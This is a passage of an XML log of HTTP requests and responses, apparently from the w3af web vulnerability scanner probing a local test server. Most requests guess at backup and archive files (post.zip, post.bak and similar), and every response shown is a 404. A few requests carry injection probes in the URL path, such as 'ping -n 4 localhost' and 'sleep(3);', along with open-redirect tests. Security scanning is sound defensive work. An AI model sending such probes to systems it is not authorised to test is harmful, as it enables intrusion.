                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="327">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="329">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="330">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="331">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="332">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post~ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="333">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="334">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="337">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="338">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="339">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="340">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.inc HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="341">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="344">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="345">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.jar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="347">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/kAOzvCd9 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="353">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.java HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="355">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="356">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="358">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.class HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="359">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.properties HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="360">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.bak HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
